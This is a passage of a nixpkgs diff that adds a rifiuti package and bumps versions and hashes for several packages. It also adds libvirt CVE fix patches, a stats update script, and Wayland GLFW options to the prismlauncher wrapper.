"mirror://sourceforge/project/odessa/Rifiuti/${finalAttrs.version}/rifiuti_${finalAttrs.version}.zip"; + hash = "sha256-bVPz0nXexGtQtXxGb3Mc79tzyZikc7KxNNWuvgu6pQ0="; + }; + + patches = [ + (fetchurl { + name = "add-GCC-hardening.patch"; + url = "https://salsa.debian.org/pkg-security-team/rifiuti/-/raw/f237358a91b12776beb9942c79ccb3aea180968a/debian/patches/add-GCC-hardening"; + hash = "sha256-Z4UajJ8WydoCKjkG4q7WsBSXWwkM8B6UXBoWN1Qas60="; + }) + (fetchurl { + name = "fix-bts-crash-on-malformed-file.patch"; + url = "https://salsa.debian.org/pkg-security-team/rifiuti/-/raw/5b51604942b518b7752843cf7d693f202dc9c6f1/debian/patches/fix-bts-crash-on-malformed-file.patch"; + hash = "sha256-1kZKC6qIGpCl1zOvKiWh6FcyYX3WozHBSPBHUsL2eMI="; + }) + (fetchurl { + name = "fix-warnings"; + url = "https://salsa.debian.org/pkg-security-team/rifiuti/-/raw/f237358a91b12776beb9942c79ccb3aea180968a/debian/patches/fix-warnings"; + hash = "sha256-9/OckpNqZQdkmNsUeHUEi6wT12mBd7aMA5dKgQAxXq8="; + }) + (fetchurl { + name = "use-CC-and-abort-on-error.patch"; + url = "https://salsa.debian.org/pkg-security-team/rifiuti/-/raw/5bd48acbcb63cee324556c4ec29750ce1e41755c/debian/patches/use-CC-and-abort-on-error.patch"; + hash = "sha256-RE4Vswtc887neJ3yAe0YWcs5YtZbwd1UtcTF4zBsmlo="; + }) + ]; + + postPatch = '' + substituteInPlace src/Makefile \ + --replace-fail gcc cc + ''; + + makeFlags = [ + "-C src" + ]; + + enableParallelBuilding = true; + + installPhase = '' + runHook preInstall + install -D bin/rifiuti $out/bin/rifiuti + runHook postInstall + ''; + + meta = with lib; { + description = "Analyze Windows Recycle Bin INFO2 file"; + mainProgram = "rifiuti"; + homepage = "https://sourceforge.net/projects/odessa/files/Rifiuti"; + maintainers = with maintainers; [ d3vil0p3r ]; + platforms = platforms.unix; + license = licenses.bsd3; + }; +}) diff --git a/pkgs/by-name/st/stats/package.nix b/pkgs/by-name/st/stats/package.nix index ed71e50f2bae4..b907d5b2db817 100644 --- a/pkgs/by-name/st/stats/package.nix +++ b/pkgs/by-name/st/stats/package.nix @@ -2,6 +2,10 @@ , stdenvNoCC , fetchurl , undmg +, writeShellApplication +, curl +, jq +, common-updater-scripts }: stdenvNoCC.mkDerivation (finalAttrs: { @@ -12,6 +16,7 @@ stdenvNoCC.mkDerivation (finalAttrs: { url = "https://github.com/exelban/stats/releases/download/v${finalAttrs.version}/Stats.dmg"; hash = "sha256-CdTY5Qv/xF9ItNgHQFqec5nKObnImx/+MuFShTfdrAo="; }; + sourceRoot = "."; nativeBuildInputs = [ undmg ]; @@ -25,12 +30,23 @@ stdenvNoCC.mkDerivation (finalAttrs: { runHook postInstall ''; + passthru.updateScript = lib.getExe (writeShellApplication { + name = "stats-update-script"; + runtimeInputs = [ curl jq common-updater-scripts ]; + text = '' + set -euo pipefail + url="$(curl --silent "https://api.github.com/repos/exelban/stats/tags?per_page=1")" + version="$(echo "$url" | jq -r '.[0].name' | cut -c 2-)" + update-source-version stats "$version" --file=./pkgs/by-name/st/stats/package.nix + ''; + }); + meta = with lib; { description = "macOS system monitor in your menu bar"; homepage = "https://github.com/exelban/stats"; license = licenses.mit; sourceProvenance = with lib.sourceTypes; [ binaryNativeCode ]; - maintainers = with maintainers; [ emilytrau Enzime ]; + maintainers = with maintainers; [ emilytrau Enzime donteatoreo ]; platforms = platforms.darwin; }; }) diff --git a/pkgs/desktops/mate/engrampa/default.nix b/pkgs/desktops/mate/engrampa/default.nix index bdac030ed3415..8ed6f37fc4d6c 100644 --- a/pkgs/desktops/mate/engrampa/default.nix +++ b/pkgs/desktops/mate/engrampa/default.nix @@ -16,11 +16,11 @@ stdenv.mkDerivation rec { pname = "engrampa"; - version = "1.26.1"; + version = "1.26.2"; src = fetchurl { url = "https://pub.mate-desktop.org/releases/${lib.versions.majorMinor version}/${pname}-${version}.tar.xz"; - sha256 = "8CJBB6ek6epjCcnniqX6rIAsTPcqSawoOqnnrh6KbEo="; + sha256 = "cx9cR7UfNvyMiWUrbnfbT7K0Zjid6ZkMmFUpo9T/iEw="; }; nativeBuildInputs = [ diff --git a/pkgs/development/libraries/libvirt/default.nix b/pkgs/development/libraries/libvirt/default.nix index 4c3740e4ba7c2..8c287870e6a88 100644 --- a/pkgs/development/libraries/libvirt/default.nix +++ b/pkgs/development/libraries/libvirt/default.nix @@ -9,6 +9,7 @@ , dnsmasq , docutils , fetchFromGitLab +, fetchpatch , gettext , glib , gnutls @@ -126,6 +127,16 @@ stdenv.mkDerivation rec { patches = [ ./0001-meson-patch-in-an-install-prefix-for-building-on-nix.patch + (fetchpatch { + name = "CVE-2024-2494.patch"; + url = "https://gitlab.com/libvirt/libvirt/-/commit/8a3f8d957507c1f8223fdcf25a3ff885b15557f2.patch"; + hash = "sha256-kxSIZ4bPOhN6PpJepoSF+EDTgdmazRWh3a3KSVfm1GU="; + }) + (fetchpatch { + name = "CVE-2024-1441.patch"; + url = "https://gitlab.com/libvirt/libvirt/-/commit/c664015fe3a7bf59db26686e9ed69af011c6ebb8.patch"; + hash = "sha256-Qi/gk7+NPz9s9OpWOnF8XW6A75C9BbVxBTE4KVwalo4="; + }) ] ++ lib.optionals enableZfs [ (substituteAll { src = ./0002-substitute-zfs-and-zpool-commands.patch; diff --git a/pkgs/development/tools/rust/cargo-deny/default.nix b/pkgs/development/tools/rust/cargo-deny/default.nix index 46a26e0fb8626..c710418050db4 100644 --- a/pkgs/development/tools/rust/cargo-deny/default.nix +++ b/pkgs/development/tools/rust/cargo-deny/default.nix @@ -9,16 +9,16 @@ rustPlatform.buildRustPackage rec { pname = "cargo-deny"; - version = "0.14.21"; + version = "0.14.22"; src = fetchFromGitHub { owner = "EmbarkStudios"; repo = "cargo-deny"; rev = version; - hash = "sha256-d5qgljNuEfh9kYQU+jP4tgyly6i7hETFC5tEY67Yq8g="; + hash = "sha256-04CRMlH31MzYpE2pRUrbAvSojbxan4ktqX9J/zjeTkk="; }; - cargoHash = "sha256-u1cayvVatGg03Q3xShC/0ymE8EGHyYFrZD3Q8UD8Mm8="; + cargoHash = "sha256-Nutx3Dvvh7qvgAtengWw0kJve4Ent9y7OXgovUZWTLE="; nativeBuildInputs = [ pkg-config diff --git a/pkgs/development/tools/rust/cargo-show-asm/default.nix b/pkgs/development/tools/rust/cargo-show-asm/default.nix index bd08268d59287..736d546ff2aae 100644 --- a/pkgs/development/tools/rust/cargo-show-asm/default.nix +++ b/pkgs/development/tools/rust/cargo-show-asm/default.nix @@ -9,14 +9,14 @@ rustPlatform.buildRustPackage rec { pname = "cargo-show-asm"; - version = "0.2.32"; + version = "0.2.34"; src = fetchCrate { inherit pname version; - hash = "sha256-4pMIL/wru9uE8Uyp/qvmo6IJxFcB0HLUHRSSV6DoI3g="; + hash = "sha256-+EzI17pnqO19A+KW1AsHtBpYZq1aENA03RkK03j31LI="; }; - cargoHash = "sha256-N1NZONY8y88diAbWn+UaSHGpd4r7naxFWVmCyJkL3tQ="; + cargoHash = "sha256-VIfT7cXrXBE9mfHpDCI3diSD9ToRPH6UUP7ZOWvumbU="; nativeBuildInputs = [ installShellFiles diff --git a/pkgs/development/tools/rust/cargo-tally/default.nix b/pkgs/development/tools/rust/cargo-tally/default.nix index 175ffe50bafa7..52c5df1e720a7 100644 --- a/pkgs/development/tools/rust/cargo-tally/default.nix +++ b/pkgs/development/tools/rust/cargo-tally/default.nix @@ -2,14 +2,14 @@ rustPlatform.buildRustPackage rec { pname = "cargo-tally"; - version = "1.0.43"; + version = "1.0.44"; src = fetchCrate { inherit pname version; - hash = "sha256-LPqoq9iry8nNXphFdmjwepNB1bK8/myOEoT4UM0xF70="; + hash = "sha256-CLMMrzEvw0QrlDPUfM67thzSXZ6hOfNw7mUVNdMcRgA="; }; - cargoHash = "sha256-FU4NYa2S9x0IXhPtWM0PyOBCGCGHj80QR7DRuDgDYJY="; + cargoHash = "sha256-XMuApConypaF6PNylDx9Dg2e1VvPy8m///Pnk/S14g8="; buildInputs = lib.optionals stdenv.isDarwin (with darwin.apple_sdk_11_0.frameworks; [ DiskArbitration diff --git a/pkgs/development/tools/rust/cargo-whatfeatures/default.nix b/pkgs/development/tools/rust/cargo-whatfeatures/default.nix index 32189e0e03cb4..051870f4db1c5 100644 --- a/pkgs/development/tools/rust/cargo-whatfeatures/default.nix +++ b/pkgs/development/tools/rust/cargo-whatfeatures/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "cargo-whatfeatures"; - version = "0.9.10"; + version = "0.9.11"; src = fetchFromGitHub { owner = "museun"; repo = pname; rev = "v${version}"; - sha256 = "sha256-80VbQyOg6jvX98QRcCVN/wwhAm4bO/UfHEIv4gP8IlA="; + sha256 = "sha256-lCS0EDSNnCii98OBZlPwwq7LBociN7zo8FZJvxt9X4w="; }; - cargoHash = "sha256-mp9KUJuwSwRuxQAEilYwNZwqe3ipN4JzsaO5Pi3V9xg="; + cargoHash = "sha256-SNhulId9naSBO7UxiiX7q0RIVJngflAO2UfpxvKDIF4="; nativeBuildInputs = [ pkg-config ]; diff --git a/pkgs/games/prismlauncher/default.nix b/pkgs/games/prismlauncher/default.nix index 2409794cdfdcb..a100d0540b0df 100644 --- a/pkgs/games/prismlauncher/default.nix +++ b/pkgs/games/prismlauncher/default.nix @@ -31,13 +31,13 @@ assert lib.assertMsg (stdenv.isLinux || !gamemodeSupport) "gamemodeSupport is on stdenv.mkDerivation (finalAttrs: { pname = "prismlauncher-unwrapped"; - version = "8.0"; + version = "8.3"; src = fetchFromGitHub { owner = "PrismLauncher"; repo = "PrismLauncher"; rev = finalAttrs.version; - hash = "sha256-WBajtfj3qAMq8zd2S53CQyHiyqtvffLOHOjmOpdALAA="; + hash = "sha256-1YGzCgNdzscnOVeNlHMFJa0RbMo6C2qQjtBOeDxHakI="; }; nativeBuildInputs = [ extra-cmake-modules cmake jdk17 ninja canonicalize-jars-hook ]; @@ -60,7 +60,11 @@ stdenv.mkDerivation (finalAttrs: { "-DLauncher_BUILD_PLATFORM=nixpkgs" ] ++ lib.optionals (msaClientID != null) [ "-DLauncher_MSA_CLIENT_ID=${msaClientID}" ] ++ lib.optionals (lib.versionOlder qtbase.version "6") [ "-DLauncher_QT_VERSION_MAJOR=5" ] - ++ lib.optionals stdenv.isDarwin [ "-DINSTALL_BUNDLE=nodeps" "-DMACOSX_SPARKLE_UPDATE_FEED_URL=''" ]; + ++ lib.optionals stdenv.isDarwin [ + "-DINSTALL_BUNDLE=nodeps" + "-DMACOSX_SPARKLE_UPDATE_FEED_URL=''" + "-DCMAKE_INSTALL_PREFIX=${placeholder "out"}/Applications/" + ]; postUnpack = '' rm -rf source/libraries/libnbtplusplus @@ -69,7 +73,7 @@ stdenv.mkDerivation (finalAttrs: { dontWrapQtApps = true; - meta = with lib; { + meta = { mainProgram = "prismlauncher"; homepage = "https://prismlauncher.org/"; description = "A free, open source launcher for Minecraft"; @@ -78,9 +82,9 @@ stdenv.mkDerivation (finalAttrs: { their own mods, texture packs, saves, etc) and helps you manage them and their associated options with a simple interface. ''; - platforms = with platforms; linux ++ darwin; - changelog = "https://github.com/PrismLauncher/PrismLauncher/releases/tag/${version}"; - license = licenses.gpl3Only; - maintainers = with maintainers; [ minion3665 Scrumplex getchoo ]; + platforms = with lib.platforms; linux ++ darwin; + changelog = "https://github.com/PrismLauncher/PrismLauncher/releases/tag/${finalAttrs.version}"; + license = lib.licenses.gpl3Only; + maintainers = with lib.maintainers; [ minion3665 Scrumplex getchoo ]; }; }) diff --git a/pkgs/games/prismlauncher/wrapper.nix b/pkgs/games/prismlauncher/wrapper.nix index 316bbbb122070..3393ff45efdcb 100644 --- a/pkgs/games/prismlauncher/wrapper.nix +++ b/pkgs/games/prismlauncher/wrapper.nix @@ -1,9 +1,12 @@ { lib , stdenv , symlinkJoin -, prismlauncher-unwrapped +, makeWrapper , wrapQtAppsHook , addOpenGLRunpath + +, prismlauncher-unwrapped + , qtbase # needed for wrapQtAppsHook , qtsvg , qtwayland @@ -11,37 +14,57 @@ , libpulseaudio , libGL , glfw +, glfw-wayland-minecraft , openal , jdk8 , jdk17 +, jdk21 , gamemode , flite , mesa-demos , pciutils , udev +, vulkan-loader , libusb1 , msaClientID ? null , gamemodeSupport ? stdenv.isLinux , textToSpeechSupport ? stdenv.isLinux , controllerSupport ? stdenv.isLinux -, jdks ? [ jdk17 jdk8 ] + + # Adds `glfw-wayland-minecraft` to `LD_LIBRARY_PATH` + # when launched on wayland, allowing for the game to be run natively. + # Make sure to enable "Use system installation of GLFW" in instance settings + # for this to take effect + # + # Warning: This build of glfw may be unstable, and the launcher + # itself can take slightly longer to start +, withWaylandGLFW ? false + +, jdks ? [ jdk21 jdk17 jdk8 ] , additionalLibs ? [ ] , additionalPrograms ? [ ] }: + +assert lib.assertMsg (withWaylandGLFW -> stdenv.isLinux) "withWaylandGLFW is only available on Linux"; + let - prismlauncherFinal = prismlauncher-unwrapped.override { + prismlauncher' = prismlauncher-unwrapped.override { inherit msaClientID gamemodeSupport; }; in + symlinkJoin { - name = "prismlauncher-${prismlauncherFinal.version}"; + name = "prismlauncher-${prismlauncher'.version}"; - paths = [ prismlauncherFinal ]; + paths = [ prismlauncher' ]; nativeBuildInputs = [ wrapQtAppsHook - ]; + ] + # purposefully using a shell wrapper here for variable expansion + # see https://github.com/NixOS/nixpkgs/issues/172583 + ++ lib.optional withWaylandGLFW makeWrapper; buildInputs = [ qtbase @@ -49,26 +72,36 @@ symlinkJoin { ] ++ lib.optional (lib.versionAtLeast qtbase.version "6" && stdenv.isLinux) qtwayland; + waylandPreExec = lib.optionalString withWaylandGLFW '' + if [ -n "$WAYLAND_DISPLAY" ]; then + export LD_LIBRARY_PATH=${lib.getLib glfw-wayland-minecraft}/lib:"$LD_LIBRARY_PATH" + fi + ''; + postBuild = '' + ${lib.optionalString withWaylandGLFW '' + qtWrapperArgs+=(--run "$waylandPreExec") + ''} + wrapQtAppsHook ''; qtWrapperArgs = let - runtimeLibs = (with xorg; [ - libX11 - libXext - libXcursor - libXrandr - libXxf86vm - ]) - ++ [ + runtimeLibs = [ + xorg.libX11 + xorg.libXext + xorg.libXcursor + xorg.libXrandr + xorg.libXxf86vm + # lwjgl libpulseaudio libGL glfw openal stdenv.cc.cc.lib + vulkan-loader # VulkanMod's lwjgl # oshi udev @@ -93,5 +126,5 @@ symlinkJoin { "--prefix PATH : ${lib.makeBinPath runtimePrograms}" ]; - inherit (prismlauncherFinal) meta; + inherit (prismlauncher') meta; } diff --git a/pkgs/os-specific/darwin/raycast/default.nix b/pkgs/os-specific/darwin/raycast/default.nix index 9671b5885c828..b6626c4d4eade 100644 --- a/pkgs/os-specific/darwin/raycast/default.nix +++ b/pkgs/os-specific/darwin/raycast/default.nix @@ -10,12 +10,12 @@ stdenvNoCC.mkDerivation (finalAttrs: { pname = "raycast"; - version = "1.71.3"; + version = "1.72.0"; src = fetchurl { name = "Raycast.dmg"; url = "https://releases.raycast.com/releases/${finalAttrs.version}/download?build=universal"; - hash = "sha256-jiGo4H38qAiGMh4ckswyeDcijYL2wbcjs+IubDFjobU="; + hash = "sha256-L6CXWRmBfit+uWODEWt7u71shFAadPOqtNifMnSp0BU="; }; dontPatch = true; diff --git a/pkgs/os-specific/linux/freeipa/default.nix b/pkgs/os-specific/linux/freeipa/default.nix index 99d8527fc1d8c..e94f6370da984 100644 --- a/pkgs/os-specific/linux/freeipa/default.nix +++ b/pkgs/os-specific/linux/freeipa/default.nix @@ -64,11 +64,11 @@ let in stdenv.mkDerivation rec { pname = "freeipa"; - version = "4.11.0"; + version = "4.11.1"; src = fetchurl { url = "https://releases.pagure.org/freeipa/freeipa-${version}.tar.gz"; - sha256 = "sha256-l/e2Dq/ako41QWEZyJCD+PA44PzTnzC8B7jYAm/Tt6Q="; + sha256 = "sha256-Ubq2xAqBvjUwrzD2R6tB0i1WsdA0Y0jnJLgi4p4r8D4="; }; nativeBuildInputs = [ diff --git a/pkgs/os-specific/linux/kernel/kernels-org.json b/pkgs/os-specific/linux/kernel/kernels-org.json index 09653f6d62a02..e73d872dc9313 100644 --- a/pkgs/os-specific/linux/kernel/kernels-org.json +++ b/pkgs/os-specific/linux/kernel/kernels-org.json @@ -1,19 +1,19 @@ { "testing": { - "version": "6.9-rc4", - "hash": "sha256:11wpak03nv9cg00jiyfrk21p7mzka553ih2c2dxr0ridig6mj8b3" + "version": "6.9-rc5", + "hash": "sha256:1rk369sz6a4m1bm7zzxj8bpdma7rgybmx8frd54kp2l5mjp7brrp" }, "6.5": { "version": "6.5.13", "hash": "sha256:1dfbbydmayfj9npx3z0g38p574pmcx3qgs49dv0npigl48wd9yvq" }, "6.1": { - "version": "6.1.87", - "hash": "sha256:092iv5w5d6kwgiyzs7zajmhdxc1w03sinvvr1dwy9bp8f9mg2ypw" + "version": "6.1.88", + "hash": "sha256:1lgqclvcxfs5c4my6fh041gxzgzz8i64cw43cf5ichy58pyh4sb9" }, "5.15": { - "version": "5.15.156", - "hash": "sha256:0y3p7sqr8hsn0v9ybqlcmn1z150zc13yckgrymb10sck9k8na14z" + "version": "5.15.157", + "hash": "sha256:0554qxnai66mpm3p5dln9dfsb392zr8zvwfwc9ks2sadsd8j7wmg" }, "5.10": { "version": "5.10.215", @@ -28,11 +28,11 @@ "hash": "sha256:0jppa4p73pssd7m3jpc7i6rgnj9gawjcgk4wmqyy87ijzrgzm553" }, "6.6": { - "version": "6.6.28", - "hash": "sha256:151kdpp25fcl5qki138jxl90h9iyk5rk0kp2xamadnz72gnid1w1" + "version": "6.6.29", + "hash": "sha256:1l6bcz0pwiby6q79va063767d0jxkkaf8rpqvaqqcb08116gf9kz" }, "6.8": { - "version": "6.8.7", - "hash": "sha256:1bigq9my88d9xh647hgsy8gzval7p06hhacpxaqb71sfmwgil799" + "version": "6.8.8", + "hash": "sha256:1fiiyvwi6frn83z730w4mng2z4nwpspvhb6vjpxx3yk0snwxqk0w" } } diff --git a/pkgs/os-specific/linux/kernel/linux-rt-5.10.nix b/pkgs/os-specific/linux/kernel/linux-rt-5.10.nix index 337594115fa6f..b013c7f1bf181 100644 --- a/pkgs/os-specific/linux/kernel/linux-rt-5.10.nix +++ b/pkgs/os-specific/linux/kernel/linux-rt-5.10.nix @@ -6,7 +6,7 @@ , ... } @ args: let - version = "5.10.213-rt105"; # updated by ./update-rt.sh + version = "5.10.215-rt107"; # updated by ./update-rt.sh branch = lib.versions.majorMinor version; kversion = builtins.elemAt (lib.splitString "-" version) 0; in buildLinux (args // { @@ -17,14 +17,14 @@ in buildLinux (args // { src = fetchurl { url = "mirror://kernel/linux/kernel/v5.x/linux-${kversion}.tar.xz"; - sha256 = "105df7w6m5a3fngi6ajqs5qblaq4lbxsgcppllrk7v1r68i31kw4"; + sha256 = "1af6h86flx96pszg006agpak2f9dkk2jqaazfykd7aafqdcs3747"; }; kernelPatches = let rt-patch = { name = "rt"; patch = fetchurl { url = "mirror://kernel/linux/kernel/projects/rt/${branch}/older/patch-${version}.patch.xz"; - sha256 = "1q5kz3mfvwb4fd5i2mbklsa6gifb8g3wbq0wi2478q097dvmb6gi"; + sha256 = "0lnnpnfmypafzfzhcmaxqqc18nna4fr236v6hrcyabnxmxam79xj"; }; }; in [ rt-patch ] ++ kernelPatches; diff --git a/pkgs/servers/matrix-synapse/default.nix b/pkgs/servers/matrix-synapse/default.nix index d964e003f094b..dc0807c130dac 100644 --- a/pkgs/servers/matrix-synapse/default.nix +++ b/pkgs/servers/matrix-synapse/default.nix @@ -17,20 +17,20 @@ let in python3.pkgs.buildPythonApplication rec { pname = "matrix-synapse"; - version = "1.105.1"; + version = "1.106.0"; format = "pyproject"; src = fetchFromGitHub { owner = "element-hq"; repo = "synapse"; rev = "v${version}"; - hash = "sha256-sul9wz9NXz87ZIbvSHWYQabTW/PlwAJJ2keaO0NbHHU="; + hash = "sha256-FnWYfFlzl6+K5dLhJ+mdphC6E6cA+HewGTUXakRHKEo="; }; cargoDeps = rustPlatform.fetchCargoTarball { inherit src; name = "${pname}-${version}"; - hash = "sha256-Cp1Bnf96invtmYayGfBVGwxW2jk/nRVCzueubd9HIG4="; + hash = "sha256-7X0lXiD+7irex8A3Tnfq65P6BinMje4Bc1MuCI3dSyg="; }; postPatch = '' diff --git a/pkgs/servers/monitoring/uptime-kuma/default.nix b/pkgs/servers/monitoring/uptime-kuma/default.nix index 7b82a205b264e..5588c777912fc 100644 --- a/pkgs/servers/monitoring/uptime-kuma/default.nix +++ b/pkgs/servers/monitoring/uptime-kuma/default.nix @@ -2,16 +2,16 @@ buildNpmPackage rec { pname = "uptime-kuma"; - version = "1.23.11"; + version = "1.23.12"; src = fetchFromGitHub { owner = "louislam"; repo = "uptime-kuma"; rev = version; - hash = "sha256-PhIe2aDz6hr8001LL8N5L8jcUyzuamU0yYIVKcwmTlw="; + hash = "sha256-uMdqCK0aJcnLJoceLs95En2qTZalcTfLWUBAJJt4ovk="; }; - npmDepsHash = "sha256-Jyp/xY9K3sfqVnR7NQhgly8B54FmvnrStFO2GO2Kszs="; + npmDepsHash = "sha256-gt7Ci8jh1u+i/PaNYp2mr9YPUOwYMMZtZ9Oic4i8chs="; patches = [ # Fixes the permissions of the database being not set correctly diff --git a/pkgs/servers/nextcloud/packages/26.json b/pkgs/servers/nextcloud/packages/26.json index 235bc9ef8aa02..7419a93ef1489 100644 --- a/pkgs/servers/nextcloud/packages/26.json +++ b/pkgs/servers/nextcloud/packages/26.json @@ -10,9 +10,9 @@ ] }, "calendar": { - "sha256": "18hlk6j3dzpcd61sgn8r8zmcc9d1bklq030kwyn4mzr20dcf75w5", - "url": "https://github.com/nextcloud-releases/calendar/releases/download/v4.6.7/calendar-v4.6.7.tar.gz", - "version": "4.6.7", + "sha256": "10sxr8xczq29a3c5a7n074hpx80a21m6v7a2xhz0yhv9q80yv5gz", + "url": "https://github.com/nextcloud-releases/calendar/releases/download/v4.7.0/calendar-v4.7.0.tar.gz", + "version": "4.7.0", "description": "The Calendar app is a user interface for Nextcloud's CalDAV server. Easily sync events from various devices with your Nextcloud and edit them online.\n\n* 🚀 **Integration with other Nextcloud apps!** Currently Contacts - more to come.\n* 🌐 **WebCal Support!** Want to see your favorite team’s matchdays in your calendar? No problem!\n* 🙋 **Attendees!** Invite people to your events\n* ⌚️ **Free/Busy!** See when your attendees are available to meet\n* ⏰ **Reminders!** Get alarms for events inside your browser and via email\n* 🔍 Search! Find your events at ease\n* ☑️ Tasks! See tasks with a due date directly in the calendar\n* 🙈 **We’re not reinventing the wheel!** Based on the great [c-dav library](https://github.com/nextcloud/cdav-library), [ical.js](https://github.com/mozilla-comm/ical.js) and [fullcalendar](https://github.com/fullcalendar/fullcalendar) libraries.", "homepage": "https://github.com/nextcloud/calendar/", "licenses": [ @@ -90,9 +90,9 @@ ] }, "forms": { - "sha256": "1nwsbl3lh0s4if4665b1z7nf7r62chazfb5g3fdrlffrrrqbdj4y", - "url": "https://github.com/nextcloud-releases/forms/releases/download/v3.4.6/forms-v3.4.6.tar.gz", - "version": "3.4.6", + "sha256": "0shdkqhip988dng2105k5cjbqfqny5791h8gdachcv3vnq99fywi", + "url": "https://github.com/nextcloud-releases/forms/releases/download/v3.4.7/forms-v3.4.7.tar.gz", + "version": "3.4.7", "description": "**Simple surveys and questionnaires, self-hosted!**\n\n- **📝 Simple design:** No mass of options, only the essentials. Works well on mobile of course.\n- **📊 View & export results:** Results are visualized and can also be exported as CSV in the same format used by Google Forms.\n- **🔒 Data under your control!** Unlike in Google Forms, Typeform, Doodle and others, the survey info and responses are kept private on your instance.\n- **🧑💻 Connect to your software:** Easily integrate Forms into your service with our full-fledged [REST-API](https://github.com/nextcloud/forms/blob/main/docs/API.md).\n- **🙋 Get involved!** We have lots of stuff planned like more question types, collaboration on forms, [and much more](https://github.com/nextcloud/forms/milestones)!", "homepage": "https://github.com/nextcloud/forms", "licenses": [ @@ -110,9 +110,9 @@ ] }, "groupfolders": { - "sha256": "1icpj855ib6cx7b57njvhdkcwgd4jmndm3gwh8qgq0mvdlkqpmd0", - "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v14.0.8/groupfolders-v14.0.8.tar.gz", - "version": "14.0.8", + "sha256": "0gw8gc17brz0acaqnaiajyl461ywxnvjdm7xqkwf0ix83qc5pbxa", + "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v14.0.9/groupfolders-v14.0.9.tar.gz", + "version": "14.0.9", "description": "Admin configured folders shared with everyone in a group.\n\nFolders can be configured from *Group folders* in the admin settings.\n\nAfter a folder is created, the admin can give access to the folder to one or more groups, control their write/sharing permissions and assign a quota for the folder.\n\nNote: Encrypting the contents of group folders is currently not supported.", "homepage": "https://github.com/nextcloud/groupfolders", "licenses": [ @@ -133,16 +133,16 @@ "sha256": "1hh35gadyxqal19pplblarffb35qc547ig3jp5464m317mykd03d", "url": "https://github.com/nextcloud-releases/integration_openai/releases/download/v1.0.11/integration_openai-v1.0.11.tar.gz", "version": "1.0.11", - "description": "This app includes 3 custom smart pickers for Nextcloud:\n* ChatGPT-like answers\n* Image generation (with DALL·E 2 or LocalAI)\n* Whisper dictation\n\nIt also implements\n\n* A Translation provider (using any available language model)\n* A SpeechToText provider (using Whisper)\n\nInstead of connecting to the OpenAI API for these, you can also connect to a self-hosted [LocalAI](https://localai.io) instance.\n\n## Ethical AI Rating\n### Rating for Text generation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n\n### Rating for Translation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n### Rating for Image generation using DALL·E via OpenAI API: 🔴\n\nNegative:\n* the software for training and inferencing of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be ran on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via OpenAI API: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* The trained model is freely available, and thus can run on-premise\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n### Rating for Text generation via LocalAI: 🟢\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n* the training data is freely available, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n\n### Rating for Image generation using Stable Diffusion via LocalAI : 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via LocalAI: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", + "description": "⚠️ The smart pickers have been removed from this app\nas they are now included in the [Assistant app](https://apps.nextcloud.com/apps/assistant).\n\nThis app implements:\n\n* Text generation providers: Free prompt, Summarize, Headline and Reformulate (using any available large language model)\n* A Translation provider (using any available language model)\n* A SpeechToText provider (using Whisper)\n* An image generation provider\n\nInstead of connecting to the OpenAI API for these, you can also connect to a self-hosted [LocalAI](https://localai.io) instance\nor to any service that implements an API similar to the OpenAI one, for example: [Plusserver](https://www.plusserver.com/en/ai-platform/).\n\n## Ethical AI Rating\n### Rating for Text generation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n\n### Rating for Translation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n### Rating for Image generation using DALL·E via OpenAI API: 🔴\n\nNegative:\n* the software for training and inferencing of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be ran on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via OpenAI API: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* The trained model is freely available, and thus can run on-premise\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n### Rating for Text generation via LocalAI: 🟢\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n* the training data is freely available, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n\n### Rating for Image generation using Stable Diffusion via LocalAI : 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 